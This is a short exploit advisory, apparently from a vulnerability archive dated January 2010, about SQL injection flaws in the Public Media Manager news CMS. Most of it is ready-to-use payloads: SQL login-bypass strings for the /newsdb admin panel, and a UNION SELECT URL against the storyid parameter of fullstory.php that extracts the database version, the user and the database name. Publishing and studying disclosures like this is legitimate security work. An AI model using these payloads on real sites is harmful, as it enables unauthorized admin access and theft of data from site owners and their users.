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Public Media Manager SQLi vulns

🗓️ 13 Jan 2010 00:00:00Reported by learn3r hackerType 
zdt
 zdt
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Public Media Manager SQL injection in login and GET variables, allowing admin panel access and information retrieval from the databas

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Public Media Manager SQLi vulns 
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Product name: Public Media Manager
 
This product, an online NEWS CMS, suffers from SQL injection in login so that we can bypass the login system.
Also, it suffers from SQLi in the GET variables which can be exploited to get different information from the database.
 
################ SQL Login Bypass #################
 
Admin panel located at: /newsdb
 
Username: validuser'#  [eg. admin'#]
Password: learn3r   [or whatever]
 
Username: ' or 1='1'#
Password: learn3r   [ or whatever]
 
################ SQL Injections ##################
 
[+] Exploit:
 
http://localhost/pmm-cms/NewsCMS/newsdb/fullstory.php?storyid=-1+union+all+select+1,concat(@@version,0x3a,user(),0x3a,database())
 
Maybe there are more vulns but I can't give more time in auditing codes.
 



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